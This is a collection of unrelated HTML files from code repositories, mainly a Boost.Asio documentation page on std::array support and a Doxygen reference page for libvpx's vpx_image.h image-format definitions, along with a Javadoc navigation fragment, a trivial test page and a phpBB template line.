CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../../com/redhat/rhn/frontend/action/keys/test/package-summary.html"><B>PREV PACKAGE</B></A>&nbsp; &nbsp;<A HREF="../../../../../../com/redhat/rhn/frontend/action/kickstart/cobbler/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../index.html?com/redhat/rhn/frontend/action/kickstart/package-summary.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
myodd/boost/libs/asio/doc/html/boost_asio/overview/cpp2011/array.html
FFMG/myoddweb.piger
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>Array Container</title> <link rel="stylesheet" href="../../../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.79.1"> <link rel="home" href="../../../index.html" title="Boost.Asio"> <link rel="up" href="../cpp2011.html" title="C++ 2011 Support"> <link rel="prev" href="variadic.html" title="Variadic Templates"> <link rel="next" href="atomic.html" title="Atomics"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../../boost.png"></td> <td align="center"><a href="../../../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="variadic.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../cpp2011.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="atomic.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="section"> <div class="titlepage"><div><div><h4 class="title"> <a name="boost_asio.overview.cpp2011.array"></a><a class="link" href="array.html" title="Array Container">Array Container</a> </h4></div></div></div> <p> Where the standard library provides <code class="computeroutput"><span class="identifier">std</span><span class="special">::</span><span class="identifier">array</span><span class="special">&lt;&gt;</span></code>, Boost.Asio: </p> <div class="itemizedlist"><ul class="itemizedlist" style="list-style-type: disc; "> <li class="listitem"> Provides overloads for the <a class="link" href="../../reference/buffer.html" title="buffer">buffer()</a> function. </li> <li class="listitem"> Uses it in preference to <code class="computeroutput"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">array</span><span class="special">&lt;&gt;</span></code> for the <a class="link" href="../../reference/ip__address_v4/bytes_type.html" title="ip::address_v4::bytes_type">ip::address_v4::bytes_type</a> and <a class="link" href="../../reference/ip__address_v6/bytes_type.html" title="ip::address_v6::bytes_type">ip::address_v6::bytes_type</a> types. </li> <li class="listitem"> Uses it in preference to <code class="computeroutput"><span class="identifier">boost</span><span class="special">::</span><span class="identifier">array</span><span class="special">&lt;&gt;</span></code> where a fixed size array type is needed in the implementation. </li> </ul></div> <p> Support for <code class="computeroutput"><span class="identifier">std</span><span class="special">::</span><span class="identifier">array</span><span class="special">&lt;&gt;</span></code> is automatically enabled for <code class="literal">g++</code> 4.3 and later, when the <code class="literal">-std=c++0x</code> or <code class="literal">-std=gnu++0x</code> compiler options are used, as well as for Microsoft Visual C++ 10. It may be disabled by defining <code class="computeroutput"><span class="identifier">BOOST_ASIO_DISABLE_STD_ARRAY</span></code>, or explicitly enabled for other compilers by defining <code class="computeroutput"><span class="identifier">BOOST_ASIO_HAS_STD_ARRAY</span></code>. </p> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2003-2016 Christopher M. Kohlhoff<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="variadic.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../cpp2011.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="atomic.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
test.html
jordotech/cole
hi chris! this is an html page
styles/prosilver/template/event/overall_header_navigation_prepend.html
schilljs/spacegame
<li class="icon-space"><a href="{U_SPACEGAME}">{L_SPACEGAME}</a></li>
submodules/build-armv7-apple-darwin/externals/libvpx/docs/html/vpx__image_8h.html
helloiloveit/VkxPhoneProject
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.3.1"/> <title>WebM VP8 Codec SDK: vpx/vpx_image.h File Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">WebM VP8 Codec SDK </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.3.1 --> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li><a href="modules.html"><span>Modules</span></a></li> <li><a href="annotated.html"><span>Data&#160;Structures</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> <li><a href="globals.html"><span>Globals</span></a></li> </ul> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="dir_ce0ab26228883e873492c15423e35021.html">vpx</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="#nested-classes">Data Structures</a> &#124; <a href="#define-members">Macros</a> &#124; <a href="#typedef-members">Typedefs</a> &#124; <a href="#enum-members">Enumerations</a> &#124; <a href="#func-members">Functions</a> </div> <div class="headertitle"> <div class="title">vpx_image.h File Reference</div> </div> </div><!--header--> <div class="contents"> <p>Describes the vpx image descriptor and associated operations. <a href="#details">More...</a></p> <p><a href="vpx__image_8h_source.html">Go to the source code of this file.</a></p> <table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="nested-classes"></a> Data Structures</h2></td></tr> <tr class="memitem:"><td class="memItemLeft" align="right" valign="top">struct &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="structvpx__image.html">vpx_image</a></td></tr> <tr class="memdesc:"><td class="mdescLeft">&#160;</td><td class="mdescRight">Image Descriptor. <a href="structvpx__image.html#details">More...</a><br/></td></tr> <tr class="separator:"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:"><td class="memItemLeft" align="right" valign="top">struct &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="structvpx__image__rect.html">vpx_image_rect</a></td></tr> <tr class="memdesc:"><td class="mdescLeft">&#160;</td><td class="mdescRight">Representation of a rectangle on a surface. <a href="structvpx__image__rect.html#details">More...</a><br/></td></tr> <tr class="separator:"><td class="memSeparator" colspan="2">&#160;</td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="define-members"></a> Macros</h2></td></tr> <tr class="memitem:a27ebbdf8031cc70b73d31825ba0d43b3"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a27ebbdf8031cc70b73d31825ba0d43b3"></a> #define&#160;</td><td class="memItemRight" valign="bottom"><b>VPX_IMAGE_H</b></td></tr> <tr class="separator:a27ebbdf8031cc70b73d31825ba0d43b3"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a2bbca4a324bbc83eb49e50b6b1b7b00d"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a2bbca4a324bbc83eb49e50b6b1b7b00d"></a> #define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#a2bbca4a324bbc83eb49e50b6b1b7b00d">VPX_IMAGE_ABI_VERSION</a></td></tr> <tr class="memdesc:a2bbca4a324bbc83eb49e50b6b1b7b00d"><td class="mdescLeft">&#160;</td><td class="mdescRight">Current ABI version number. <br/></td></tr> <tr class="separator:a2bbca4a324bbc83eb49e50b6b1b7b00d"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aba054d28e7205f3cbd260c8b1e741bca"><td class="memItemLeft" align="right" valign="top">#define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#aba054d28e7205f3cbd260c8b1e741bca">VPX_IMG_FMT_PLANAR</a>&#160;&#160;&#160;0x100</td></tr> <tr class="separator:aba054d28e7205f3cbd260c8b1e741bca"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a52193af375ccdbe6b1fc2c706e308b4e"><td class="memItemLeft" align="right" valign="top">#define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#a52193af375ccdbe6b1fc2c706e308b4e">VPX_IMG_FMT_UV_FLIP</a>&#160;&#160;&#160;0x200</td></tr> <tr class="separator:a52193af375ccdbe6b1fc2c706e308b4e"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:adceef04930837f46dad16d648cb152f9"><td class="memItemLeft" align="right" valign="top">#define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#adceef04930837f46dad16d648cb152f9">VPX_IMG_FMT_HAS_ALPHA</a>&#160;&#160;&#160;0x400</td></tr> <tr class="separator:adceef04930837f46dad16d648cb152f9"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aed2dfee103bf123bad08ceefdba21301"><td class="memItemLeft" align="right" valign="top">#define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#aed2dfee103bf123bad08ceefdba21301">VPX_PLANE_PACKED</a>&#160;&#160;&#160;0</td></tr> <tr class="separator:aed2dfee103bf123bad08ceefdba21301"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a08171c4636c655e1ab0b76e06219f9e2"><td class="memItemLeft" align="right" valign="top">#define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#a08171c4636c655e1ab0b76e06219f9e2">VPX_PLANE_Y</a>&#160;&#160;&#160;0</td></tr> <tr class="separator:a08171c4636c655e1ab0b76e06219f9e2"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a4770fc8fa60021a2229f25553152cf81"><td class="memItemLeft" align="right" valign="top">#define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#a4770fc8fa60021a2229f25553152cf81">VPX_PLANE_U</a>&#160;&#160;&#160;1</td></tr> <tr class="separator:a4770fc8fa60021a2229f25553152cf81"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aca9436ec761457cc6d2e356e0ac2fd23"><td class="memItemLeft" align="right" valign="top">#define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#aca9436ec761457cc6d2e356e0ac2fd23">VPX_PLANE_V</a>&#160;&#160;&#160;2</td></tr> <tr class="separator:aca9436ec761457cc6d2e356e0ac2fd23"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ac7a57e3c466f599abbcbd655db92c24d"><td class="memItemLeft" align="right" valign="top">#define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#ac7a57e3c466f599abbcbd655db92c24d">VPX_PLANE_ALPHA</a>&#160;&#160;&#160;3</td></tr> <tr class="separator:ac7a57e3c466f599abbcbd655db92c24d"><td class="memSeparator" colspan="2">&#160;</td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="typedef-members"></a> Typedefs</h2></td></tr> <tr class="memitem:acb76f0439d5d186256371aadf3beeee4"><td class="memItemLeft" align="right" valign="top">typedef enum <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193">vpx_img_fmt</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#acb76f0439d5d186256371aadf3beeee4">vpx_img_fmt_t</a></td></tr> <tr class="memdesc:acb76f0439d5d186256371aadf3beeee4"><td class="mdescLeft">&#160;</td><td class="mdescRight">List of supported image formats. <a href="#acb76f0439d5d186256371aadf3beeee4">More...</a><br/></td></tr> <tr class="separator:acb76f0439d5d186256371aadf3beeee4"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:abf5ac962cc6d71b4f0e39b1b0d033e55"><td class="memItemLeft" align="right" valign="top">typedef struct <a class="el" href="structvpx__image.html">vpx_image</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a></td></tr> <tr class="memdesc:abf5ac962cc6d71b4f0e39b1b0d033e55"><td class="mdescLeft">&#160;</td><td class="mdescRight">Image Descriptor. <a href="#abf5ac962cc6d71b4f0e39b1b0d033e55">More...</a><br/></td></tr> <tr class="separator:abf5ac962cc6d71b4f0e39b1b0d033e55"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aba8af9e601eb9c3c41431d0f4fef65a6"><td class="memItemLeft" align="right" valign="top">typedef struct <a class="el" href="structvpx__image__rect.html">vpx_image_rect</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#aba8af9e601eb9c3c41431d0f4fef65a6">vpx_image_rect_t</a></td></tr> <tr class="memdesc:aba8af9e601eb9c3c41431d0f4fef65a6"><td class="mdescLeft">&#160;</td><td class="mdescRight">Representation of a rectangle on a surface. <a href="#aba8af9e601eb9c3c41431d0f4fef65a6">More...</a><br/></td></tr> <tr class="separator:aba8af9e601eb9c3c41431d0f4fef65a6"><td class="memSeparator" colspan="2">&#160;</td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="enum-members"></a> Enumerations</h2></td></tr> <tr class="memitem:a7a30a7bff7400fb83ad45fede5077193"><td class="memItemLeft" align="right" valign="top">enum &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193">vpx_img_fmt</a> { <br/> &#160;&#160;<b>VPX_IMG_FMT_NONE</b>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a768c82ecfd7f7de4095ba587185cacc3">VPX_IMG_FMT_RGB24</a>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a6a4b7c1ab7811898df2c433168f8cad7">VPX_IMG_FMT_RGB32</a>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a0e0df90f12025dffb425ab586bc190b8">VPX_IMG_FMT_RGB565</a>, <br/> &#160;&#160;<a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a7801d709598e8aa57a811ef008389fac">VPX_IMG_FMT_RGB555</a>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193aaac20056f1282ec3e23b2f3df5197ebd">VPX_IMG_FMT_UYVY</a>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a54251eea14c31a916a9181d8e38bcc2e">VPX_IMG_FMT_YUY2</a>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a6982ba2da461ca8d7b7a8a2efd018dea">VPX_IMG_FMT_YVYU</a>, <br/> &#160;&#160;<a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a5c585a577f88505845496cba7054a412">VPX_IMG_FMT_BGR24</a>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a289f1c915217fd690228890db7033303">VPX_IMG_FMT_RGB32_LE</a>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a62257fab5e53c2c1b589e4befbaa4643">VPX_IMG_FMT_ARGB</a>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a933ca0d3511dccb7128a010c9443f13b">VPX_IMG_FMT_ARGB_LE</a>, <br/> &#160;&#160;<a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193ae1040770cb4f2b60931e1b0d31c39c8a">VPX_IMG_FMT_RGB565_LE</a>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193ac79b2394abe0cc6c9068b7ef0007d74e">VPX_IMG_FMT_RGB555_LE</a>, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a6e4e8961bbcf96478c300dc4c3e1dc18">VPX_IMG_FMT_YV12</a> = 0x100 | 0x200 | 1, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193af17ce49c9a6efd7c8c8ea8928d4ce26c">VPX_IMG_FMT_I420</a> = 0x100 | 2, <br/> &#160;&#160;<a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a63e1daa51719dc6129881abe81a016fc">VPX_IMG_FMT_VPXYV12</a> = 0x100 | 0x200 | 3, <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193a42d26966faf7079e80cbbfee1d698493">VPX_IMG_FMT_VPXI420</a> = 0x100 | 4 <br/> }</td></tr> <tr class="memdesc:a7a30a7bff7400fb83ad45fede5077193"><td class="mdescLeft">&#160;</td><td class="mdescRight">List of supported image formats. <a href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193">More...</a><br/></td></tr> <tr class="separator:a7a30a7bff7400fb83ad45fede5077193"><td class="memSeparator" colspan="2">&#160;</td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="func-members"></a> Functions</h2></td></tr> <tr class="memitem:ab80398f28ca880368a922fa979eb66c1"><td class="memItemLeft" align="right" valign="top"><a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#ab80398f28ca880368a922fa979eb66c1">vpx_img_alloc</a> (<a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *img, <a class="el" href="vpx__image_8h.html#acb76f0439d5d186256371aadf3beeee4">vpx_img_fmt_t</a> fmt, unsigned int d_w, unsigned int d_h, unsigned int align)</td></tr> <tr class="memdesc:ab80398f28ca880368a922fa979eb66c1"><td class="mdescLeft">&#160;</td><td class="mdescRight">Open a descriptor, allocating storage for the underlying image. <a href="#ab80398f28ca880368a922fa979eb66c1">More...</a><br/></td></tr> <tr class="separator:ab80398f28ca880368a922fa979eb66c1"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:afaf35f1f2f2f634de394faf7d6aeeeb9"><td class="memItemLeft" align="right" valign="top"><a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#afaf35f1f2f2f634de394faf7d6aeeeb9">vpx_img_wrap</a> (<a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *img, <a class="el" href="vpx__image_8h.html#acb76f0439d5d186256371aadf3beeee4">vpx_img_fmt_t</a> fmt, unsigned int d_w, unsigned int d_h, unsigned int align, unsigned char *img_data)</td></tr> <tr class="memdesc:afaf35f1f2f2f634de394faf7d6aeeeb9"><td class="mdescLeft">&#160;</td><td class="mdescRight">Open a descriptor, using existing storage for the underlying image. <a href="#afaf35f1f2f2f634de394faf7d6aeeeb9">More...</a><br/></td></tr> <tr class="separator:afaf35f1f2f2f634de394faf7d6aeeeb9"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ab5c1d1a5548752f7cd5047f43d5f25c4"><td class="memItemLeft" align="right" valign="top">int&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#ab5c1d1a5548752f7cd5047f43d5f25c4">vpx_img_set_rect</a> (<a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *img, unsigned int x, unsigned int y, unsigned int w, unsigned int h)</td></tr> <tr class="memdesc:ab5c1d1a5548752f7cd5047f43d5f25c4"><td class="mdescLeft">&#160;</td><td class="mdescRight">Set the rectangle identifying the displayed portion of the image. <a href="#ab5c1d1a5548752f7cd5047f43d5f25c4">More...</a><br/></td></tr> <tr class="separator:ab5c1d1a5548752f7cd5047f43d5f25c4"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a01201327328c1cdd365632e5056b1850"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#a01201327328c1cdd365632e5056b1850">vpx_img_flip</a> (<a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *img)</td></tr> <tr class="memdesc:a01201327328c1cdd365632e5056b1850"><td class="mdescLeft">&#160;</td><td class="mdescRight">Flip the image vertically (top for bottom) <a href="#a01201327328c1cdd365632e5056b1850">More...</a><br/></td></tr> <tr class="separator:a01201327328c1cdd365632e5056b1850"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:af47ebaf286812d037425d41990d48a17"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="vpx__image_8h.html#af47ebaf286812d037425d41990d48a17">vpx_img_free</a> (<a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *img)</td></tr> <tr class="memdesc:af47ebaf286812d037425d41990d48a17"><td class="mdescLeft">&#160;</td><td class="mdescRight">Close an image descriptor. <a href="#af47ebaf286812d037425d41990d48a17">More...</a><br/></td></tr> <tr class="separator:af47ebaf286812d037425d41990d48a17"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> <a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2> <div class="textblock"><p>Describes the vpx image descriptor and associated operations. </p> </div><h2 class="groupheader">Macro Definition Documentation</h2> <a class="anchor" id="aba054d28e7205f3cbd260c8b1e741bca"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define VPX_IMG_FMT_PLANAR&#160;&#160;&#160;0x100</td> </tr> </table> </div><div class="memdoc"> <p>Image is a planar format </p> </div> </div> <a class="anchor" id="a52193af375ccdbe6b1fc2c706e308b4e"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define VPX_IMG_FMT_UV_FLIP&#160;&#160;&#160;0x200</td> </tr> </table> </div><div class="memdoc"> <p>V plane precedes U plane in memory </p> </div> </div> <a class="anchor" id="adceef04930837f46dad16d648cb152f9"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define VPX_IMG_FMT_HAS_ALPHA&#160;&#160;&#160;0x400</td> </tr> </table> </div><div class="memdoc"> <p>Image has an alpha channel component </p> </div> </div> <a class="anchor" id="aed2dfee103bf123bad08ceefdba21301"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define VPX_PLANE_PACKED&#160;&#160;&#160;0</td> </tr> </table> </div><div class="memdoc"> <p>To be used for all packed formats </p> </div> </div> <a class="anchor" id="a08171c4636c655e1ab0b76e06219f9e2"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define VPX_PLANE_Y&#160;&#160;&#160;0</td> </tr> </table> </div><div class="memdoc"> <p>Y (Luminance) plane </p> </div> </div> <a class="anchor" id="a4770fc8fa60021a2229f25553152cf81"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define VPX_PLANE_U&#160;&#160;&#160;1</td> </tr> </table> </div><div class="memdoc"> <p>U (Chroma) plane </p> </div> </div> <a class="anchor" id="aca9436ec761457cc6d2e356e0ac2fd23"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define VPX_PLANE_V&#160;&#160;&#160;2</td> </tr> </table> </div><div class="memdoc"> <p>V (Chroma) plane </p> </div> </div> <a class="anchor" id="ac7a57e3c466f599abbcbd655db92c24d"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define VPX_PLANE_ALPHA&#160;&#160;&#160;3</td> </tr> </table> </div><div class="memdoc"> <p>A (Transparency) plane </p> </div> </div> <h2 class="groupheader">Typedef Documentation</h2> <a class="anchor" id="acb76f0439d5d186256371aadf3beeee4"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">typedef enum <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193">vpx_img_fmt</a> <a class="el" href="vpx__image_8h.html#acb76f0439d5d186256371aadf3beeee4">vpx_img_fmt_t</a></td> </tr> </table> </div><div class="memdoc"> <p>List of supported image formats. </p> <p>alias for enum vpx_img_fmt </p> </div> </div> <a class="anchor" id="abf5ac962cc6d71b4f0e39b1b0d033e55"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">typedef struct <a class="el" href="structvpx__image.html">vpx_image</a> <a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a></td> </tr> </table> </div><div class="memdoc"> <p>Image Descriptor. </p> <p>alias for struct <a class="el" href="structvpx__image.html" title="Image Descriptor.">vpx_image</a> </p> </div> </div> <a class="anchor" id="aba8af9e601eb9c3c41431d0f4fef65a6"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">typedef struct <a class="el" href="structvpx__image__rect.html">vpx_image_rect</a> <a class="el" href="vpx__image_8h.html#aba8af9e601eb9c3c41431d0f4fef65a6">vpx_image_rect_t</a></td> </tr> </table> </div><div class="memdoc"> <p>Representation of a rectangle on a surface. </p> <p>alias for struct <a class="el" href="structvpx__image__rect.html" title="Representation of a rectangle on a surface.">vpx_image_rect</a> </p> </div> </div> <h2 class="groupheader">Enumeration Type Documentation</h2> <a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">enum <a class="el" href="vpx__image_8h.html#a7a30a7bff7400fb83ad45fede5077193">vpx_img_fmt</a></td> </tr> </table> </div><div class="memdoc"> <p>List of supported image formats. </p> <table class="fieldtable"> <tr><th colspan="2">Enumerator</th></tr><tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a768c82ecfd7f7de4095ba587185cacc3"></a>VPX_IMG_FMT_RGB24</em>&nbsp;</td><td class="fielddoc"> <p>24 bit per pixel packed RGB </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a6a4b7c1ab7811898df2c433168f8cad7"></a>VPX_IMG_FMT_RGB32</em>&nbsp;</td><td class="fielddoc"> <p>32 bit per pixel packed 0RGB </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a0e0df90f12025dffb425ab586bc190b8"></a>VPX_IMG_FMT_RGB565</em>&nbsp;</td><td class="fielddoc"> <p>16 bit per pixel, 565 </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" 